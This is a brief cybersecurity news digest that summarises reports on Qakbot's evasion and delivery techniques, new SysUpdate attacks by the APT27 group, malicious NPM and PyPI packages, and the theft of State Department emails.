The Hacker News reports that Qakbot malware operators have been discovered by Zscaler researchers to have adopted code obfuscation and new attack chain layers, as well as leveraged various URLs and file extensions for payload delivery in an effort to better conceal their operations.
"Most recently, threat actors have transformed their techniques to evade detection by using ZIP file extensions, enticing file names with common formats, and Excel (XLM) 4.0 to trick victims into downloading malicious attachments that install Qakbot," said Zscaler Threatlabz researchers Aditya Sharma and Tarun Dewan.
Microsoft's plan to enable Office macro blocking by default, which was temporarily paused, had prompted Qakbot to hasten its transition to .LNK files from XLM macros in May. Qakbot has also made changes to enable DLL malware downloads through PowerShell, as well as allow the use of rundll32.exe for payload delivery.
Fortinet researchers previously noted that Qakbot has been desired by threat actors due to its modularity and detection resilience.
New attacks with the updated SysUpdate toolkit have been deployed by Chinese advanced persistent threat operation Budworm, also known as APT27, Emissary Panda, Bronze Union, Lucky Mouse, Iron Tiger, and Red Phoenix, against an Asian government and a Middle East-based telecommunications provider, reports The Hacker News.
Forty-five malicious NPM and PyPI packages have been deployed by threat actors to facilitate extensive data theft operations as part of a campaign that commenced on Sept. 12, according to BleepingComputer.
Sixty thousand emails from U.S. State Department accounts were noted by a staffer working for Sen. Eric Schmitt, R-Mo., to have been exfiltrated by Chinese threat actors during the widespread compromise of Microsoft email accounts that commenced in May, according to Reuters.